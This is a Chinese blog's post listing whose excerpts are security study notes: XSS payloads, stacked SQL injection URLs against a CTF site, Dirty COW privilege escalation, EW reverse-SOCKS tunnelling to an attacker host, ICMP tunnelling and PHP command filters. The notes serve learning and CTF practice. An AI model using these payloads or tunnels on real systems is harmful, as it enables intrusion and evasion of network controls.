自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(63)
  • 收藏
  • 关注

原创 elk的理解

1.大规模数据分析的需求数据归档,多维度的检索,高效率的搜索完整的日志系统:1.1 收集数据:从多个终端收集数据1.2 传输数据:稳定可靠的传输数据1.3 存储数据:大规模数据的存储1.4 数据分析:对于数据进行梳理1.5 错误告警:对于报错内容通告2.elk2.1 elasticsearch:搜索分析引擎,具备实时文件存储,分布式收索2.1.1 存储存储是一条数据是一个文档,通过json进行序列化。Elasticsearch ⇒ 索引(Index) ⇒ 类型(type)

2021-12-06 22:08:51 883

原创 HDFS

HDFS:Hadoop Distributed File System(Hadoop分布式文件系统)原理HDFS采用了主从(Master/Slave)结构模型:一个HDFS集群是由一个NameNode和若干个DataNode组成的。其中NameNode作为主服务器,管理文件系统的命名空间和客户端对文件的访问操作;集群中的DataNode管理存储的数据。一个假定就是迁移计算到离数据更近的位置比将数据移动到程序运行更近的位置要更好。HDFS提供了接口,来让程序将自己移动到离数据存储更近的位置。

2021-10-19 21:54:57 208

原创 end的Docker基本使用

安装Centos安装docker:curl -fsSL https://get.docker.com | bash -s docker --mirror aliyun设置 Docker 仓库:sudo yum install -y yum-utils device-mapper-persistent-data lvm2设置 Docker 仓库:sudo yum-config-manager --add-repo https://mirrors.tuna.tsinghua.edu.cn/docker

2021-07-31 20:59:11 149

原创 ICMPTunnel

ICMPTUNNELicmptunnel下载地址:http://freshmeat.sourceforge.net/projects/ptunnel按照命令linux:tar zxf PingTunnel-0.72.tar.gzcd PingTunnelmake && makeinstall构建PCAP:apt-get install flexwget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gztar zxf

2021-07-25 22:57:18 244

原创 了解内网穿透

内网穿透的概念:内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。通信双方一台位于 NAT 之后:一台主机有一个公网 IP,另一台主机有一个内网 IP。Client A 位于 NAT 之后,并拥有[IP 地址:端口]对[10.0.0.1:1234],Client B位于 NAT 之前,并拥有[IP 地址:端口]对[138.76.2

2021-07-02 14:48:22 936

原创 2021-06-24 XSS

<script>alert("test")</script><img src="javascript:alert('XSS')"><img src="#" onerror=alert(/跨站/)></img><img src="javascript:alert(/xss/)"><iframe/onload=alert(/insight-labs/)><div style=”width:express

2021-06-25 00:02:05 104

原创 2021-06-05 AWD准备

脏牛提权(cve-2016-5159)3.9>Linux内核 >= 2.6.221.使用uname -a命令查看linux内核信息2.使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译3.执行./dirty 密码命令,即可进行提权。AoiAWD> 启动 #: ./aoiawd.phar> 登录: 0.0.0.0:1337 > 密码: 003743942ca257ed

2021-06-05 17:16:47 500 1

原创 KALI-64位运行32位程序解决和EW初步使用

dpkg --add-architecture i386wget archive.kali.org/archive-key.ascapt-key add archive-key.ascapt-get updateapt-get install libc6:i386 ./ew_linux -s rcsocks -l 1080 -e 1234ew_win -s rsscocks -d 攻击主机地址 -e 1234拓展应用EW与proxyresolv 配合:proxyresolv可启动nma

2021-06-04 00:01:25 627

原创 2021-4-26

1,<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $file

2021-04-26 22:14:02 191

原创 end的学习 21-4-20

mkdir创建权限为777的目录:mkdir -m 777 test3通过 mkdir 命令可以实现在指定位置创建以 DirName(指定的文件名)命名的文件夹或目录。要创建文件夹或目录的用户必须对所创建的文件夹的父文件夹具有写权限。并且,所创建的文件夹(目录)不能与其父目录(即父文件夹)中的文件名重名,即同一个目录下不能有同名的(区分大小写)。chdir()chdir() 函数改变当前的目录。<?php// Get current directoryecho getcwd() .

2021-04-20 21:50:45 132

原创 end 21-4-19

强网杯 2019 随便注http://www.bmzclub.cn:20431/?inject=1';show database;#http://www.bmzclub.cn:20431/?inject=1';show tables;#http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;#http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla

2021-04-19 23:09:59 148

原创 end的python学习

Python os.popen() 方法os.popen() 方法用于从一个命令打开一个管道。popen()方法语法格式如下:os.popen(command[, mode[, bufsize]])command -- 使用的命令。mode -- 模式权限可以是 'r'(默认) 或 'w'。bufsize -- 指明了文件需要的缓冲大小:0意味着无缓冲;1意味着行缓冲;其它正值表示使用参数大小的缓冲(大概值,以字节为单位)。负的bufsize意味着使用系统的默认值,一般来说,对于tty设

2021-04-18 23:44:01 256 2

原创 end的学习反序列化4

1,<?phpinclude "flag5.php";class funny{ private $a; function __construct() { $this->a = "givemeflag"; } function __destruct() { global $flag; if ($this->a === "givemeflag") { echo $flag;

2021-04-18 00:28:54 430 1

原创 end的学习 ICMP主机探测

parser.add_optionadd_option用来加入选项,action是有store,store_true,store_false等,dest是存储的变量,default是缺省值,help是帮助提示 。最后通过parse_args()函数的解析。parse_args() 返回的两个值:(options, args) = parser.parse_args()options,它是一个对象(optpars.Values),保存有命令行参数值。只要知道命令行参数名,如 file,就可以访问其对

2021-04-14 22:26:09 181

原创 end的学习反序列化存储和使用的引擎不一样(session.serialize_handler)

session.serialize_handlersession.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。 php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 php:存储方式是,键名+竖线+经过serialize()函数序列处理的值 php_serialize(php>5.5.4

2021-04-13 21:07:08 240

原创 end的学习反序列化3

1,wakeup<?php class SoFun{ //类 protected $file='index.php';//protected:是受保护的,只有在类内部以及继承类中使用,类外部不能使用。换 function __destruct(){//函数 if(!empty($this->file)) {//empty() 函数用于检查一个变量是否为空。 if(strchr($this-> file,"\\")===false && st

2021-04-08 21:17:45 355

原创 end的学习python(异常处理结构,Socket网络编程)

异常处理结构1,try…except…id=input('chengji:')try: id=int(id) if(0<id<=100): print('id=',id) else: print('输入的id超值了!')except Exception as e: print('输入错误')2,try…except…else…id=input('chengji:')try: id=int(id)except

2021-04-07 21:58:16 116

原创 end的信息收集和python基础复习

信息收集判断域名是否存在CDN使用网站http://ping.chianz.comping :https://www.bilibili.com/查询出ip地址多于1个时说明这些ip地址不是真实的服务器地址。绕过CDN获取真实IP1,通过内部邮箱来获取网站真实IP通过目标网站的邮箱注册或者订阅邮件等功能,让网站的邮箱服务器给自己的邮箱服务器发送邮件。查看邮件的原始邮件头。2,查看域名的历史解析记录。通过网站: https://dnsdb.io/zh-cn3,子域名查询CDN服务,细小

2021-04-06 23:19:23 121

原创 end的python学习shiro检测

识别SHIRO框架:请求包里面发送:RememberMe=响应头里面出现cookie rememberme代码检测是否使用SHIRO框架:import requestsimport urllib3urllib3.disable_warnings()header={ 'cookie':'rememberMe=1'}def check_shiro(url): res=requests.get(url,verify=False,headers=header) if

2021-04-05 21:10:50 396

原创 end的学习python---端口扫描

连接百度80端口import sockets=socket.socket()s.connect(("www.baidu.com",80))s.send(b"test\n")print(s.recv(1024))多线程端口扫描import socketfrom concurrent.futures import ThreadPoolExecutorfrom rich.progress import ( Progress, TextColumn, BarColumn

2021-03-30 22:55:34 131

原创 end的爬虫学习1-----获取子域名

网页文本获取import requestsurl='https://www.baidu.com'headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}html=requests.get(url,headers=headers).textprint(html)xpath的标签定位nodename选取此节点的所有子节点/

2021-03-29 21:52:27 308

原创 ori的学习7---SQL注入

逻辑语句:or,and1, and的优先级高于or原理:1, 注入的是sql语句2, 用户不可控----web站点管理者不可控3, 注入sql语句让原始查询语句语义发生改变万能密码----核心是注释掉passwd字段------利用or让where后面语句变为真分类按数据类型分类:1, 数字型2, 字符型闭合:①判断字符串的表现方式(单引号,双引号,原括号)-------模糊测试按数据的获取方式来分:1, 报错注入:会使用报错函数2, 回显注入:DB中查询结构直接显示回

2021-03-25 09:22:22 183

原创 ori的学习6--Web基础

一, 网站结构1, 发展Web1.0—静态网页—无数据库----难运维Web2.0—动态网页—数据库2, 结构前端----用户电脑和浏览器—数据展示与数据输入,文件下载,文件上传后端----web服务器-----发布web网站,数据处理----保存网页文件的中间件----发布网站,脚本解析器----php/jsp/asp/aspx,数据库—存数据—sql 前后台前台—权限较小—普通用户 后台—权限大—管理员3, 数据传输:前端接收数据,后端输出数据。后端将输出的内容拼接成静态

2021-03-25 09:13:25 142

原创 ori的学习5----VRRP+STP+DHCP+NAT

DHCP:主机数量多的时候分配ipDHCP服务器:分配IP地址-----接口地址池,全局地址池。DISCOVER:寻找DHCP服务器OFFER:DHCP服务器响应discover报文,携带了各种配置信息:客户的MAC地址、服务器提供的IP地址、子网掩码、租期以及提供IP的DHCP服务器的IP。REQUEST:请求配置确认,或者续借租期(广播)ACK:服务器对request报文的确认响应NAK:服务器对request报文拒绝RELEASE:客户端释放地址时用来通知服务器

2021-03-17 00:04:39 375

原创 ori的学习4--交换通信原理

交换机转发动作:1, 泛洪 -----不知道路,广播地址2, 转发 -----知道地址3, 丢弃-----环路(int 0/0进 目的int 0/0),畸形报文(报文标识flag)4, 更新------老化时间(一般为300s,MAC地址重新学习)VLAN广播报文在局域网内传播,arp报文可以到达。VLAN划分基于端口(路由器)或者MAC(主机),按网络层划分,按IP组播划分。PVID:转无论什么时候交换机trunk端口都必须有pvid,因为trunk链路可以发送和接收被802.1q标

2021-03-16 10:42:43 264

原创 python pip更新换源

VS的换源:在C:\User\用户名\pip 目录下新建PIP.INI[global]timeout = 6000index-url = https://pypi.tuna.tsinghua.edu.cn/simpletrusted-host = pypi.tuna.tsinghua.edu.cnpip更新强制更新python -m pip install -U --force-reinstall pip...

2021-01-31 13:31:24 376 1

原创 CTF WEB练习

hctf_2018_warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_s

2021-01-28 21:51:29 230

原创 END的学习 SQL注入绕过 and POST基于时间和布尔的盲注

SQL注入绕过1,大小写绕过2,双写绕过3,编码绕过可以使用URL编码,ASCII,HEX,unicode编码绕过4,内联注释绕过/*!内容*/5,绕过空格(注释符/ /,%a0)两个空格代替一个空格,用Tab代替空格,%a0=空格,注释替换空格.括号绕过空格如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。select(user())from dual

2020-12-12 13:32:54 803

原创 end的学习(Session验证,Python yaml 反序列化,nodejs RCE)

Session验证用户登录用户提交包含用户名和密码的表单,发送HTTP请求。服务器验证用户发来的用户名密码。如果正确则把当前用户名(通常是用户对象)存储到redis中,并生成它在redis中的ID。 这个ID称为Session ID,通过Session ID可以从Redis中取出对应的用户对象, 敏感数据(比如authed=true)都存储在这个用户对象中。设置Cookie为sessionId=xxxxxx|checksum并发送HTTP响应, 仍然为每一项Cookie都设置签名。

2020-12-04 21:13:33 341

原创 end的学习凭证窃取技巧1(WINDOWS)

0x01Windows 本地密码HashWindows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值(用户密码)。NTLM的认证流程:1、首先在客户端中输入username,password和domain,然后客户端会把密码进行Hash后的值先缓存到本地。2、Client将username的明文发送给DC(域控)。3、DC会生成一个16字节的随机数,也就

2020-11-18 22:05:46 187

原创 end的学习站库分离渗透思路

0X00 站库分离站库分离其实就是管理员将网站程序和数据库分别放在了不同的内网服务器上。0X01站库分离渗透入口(1) Web入口渗透通过网站的各种漏洞来Getshell,如:文件上传、文件包含、命令执行、代码执行、SQL注入写入一句话(Into outfile、日志备份)等,在获得Webshell权限或者有诸如文件读取等漏洞时,我们可以读数据库配置文件、对数据库内容分析、查找数据库备份,进而对内网数据库服务器进行渗透。(2) Data入口渗透从数据库入口渗透同样是为了获取更大的权限,或者扩展我

2020-11-17 21:32:59 1854

原创 end的学习 php反序列化字符逃逸1

基础知识反序列化时,序列化的值是以;作为字段的分隔,在结尾是以}结束,我们稍微了解一下:<?php class people{ public $name = 'tom'; public $sex = 'boy'; public $age= '12'; } $a=new people(); print_r(serialize($a));?>//O:6:"people":3:{s:4:"name";s:3:"tom";s:3:"sex";s:3:"boy";

2020-11-10 20:19:01 108

原创 end遇见不懂的2

无限制本地文件包含<?php $filename = $_GET['filename']; include($filename);?>/?file=…/…/…/…/…/…/etc/passwd常见的敏感信息路径:Windows系统: c:\boot.ini // 查看系统版本 c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件 c:\windows\repair\sam // 存储W

2020-11-01 16:35:42 183

原创 闲人的学习无参数函数的构建

getallheaders()函数getenv()函数是用来获取环境变量的,而这个getallheaders则是用来获取http header的<?phpvar_dump(getallheaders());?>利用:在http头部写入一些恶意函数,添加一个头信息,value=phpinfo();那么只要把var_dump改成eval(),那phpinfo就会被执行。?注入点=eval(current(getallheaders()));(这个函数是apache环境才能使用)

2020-10-29 21:29:42 337

原创 end的注入学习6(sqlite建表注入,getenv())

url_for()函数(flask)1.url_for()作用:(1)给指定的函数构造 URL。(2)访问静态文件(CSS / JavaScript 等)。 只要在你的包中或是模块的所在目录中创建一个名为 static 的文件夹,在应用中使用 /static 即可访问。{{url_for.globals.[‘current.app’].config}}get_flashed_messages函数get_flashed_messages方法取出(闪现信息只能取出一次,取出后闪现信息会被清空){{

2020-10-28 20:32:32 230

原创 END闲人的学习exit()绕过和命令执行漏洞

exit()exit()与_exit()exit()和_exit()这两个函数都是用于函数退出。exit()函数里会调用_exit()函数。下面来看看exit()的函数代码大概:void exit(int status){ while(_exit_funcs != NULL) { ... _exit_funcs = _exit_funcs->next; } ... _exit(status);}其中_exit_fu

2020-10-26 20:14:05 880 1

原创 end的sql学习5

数学函数利用(只能输入数学函数时):先进行异或<?php$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite'

2020-10-26 00:36:29 260

原创 end的漏洞学习

CSRFCSRF:跨站请求伪造(盗用身份,以你的名义进行某些非法的操作)CSRF攻击是建立在会话之上的。主要有2点:1,CSRF建立在浏览器与Web服务器的会话中2,欺骗用户访问URL方法GET方法POST<html> <body> <form id="myfrom" method="post" action="http://173.82.206.142:8005/"> <input type="hidden" nam

2020-10-23 21:28:56 94

原创 end遇见不懂的问题

strcmp() 函数语法:strcmp(string1,string2) 0 - 如果两个字符串相等<0 - 如果 string1 小于 string2>0 - 如果 string1 大于 string2GET请求:?a[]=2因为strcmp()无法比较数组,则报错并返回0,0==0成立md5()弱类型和sha1()函数(绕过)1.md5:①经过md5加密之后相等,首先我们能想到的是md5的一个缺陷,也就是说经过md5加密之后以0e开头的,值都为0,那是因为0e在比较的时

2020-10-21 20:27:59 218

原创 waf绕过方法闲人

一:动态调用waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉。在我们真正恶意代码前加入大量杂糅字符进行绕过;然后对后缀进行换行绕过;��[.ShellClassInfo]LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770IconResource=%SystemRoot%\system32\imageres.dll,-112

2020-10-16 16:51:13 1873

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除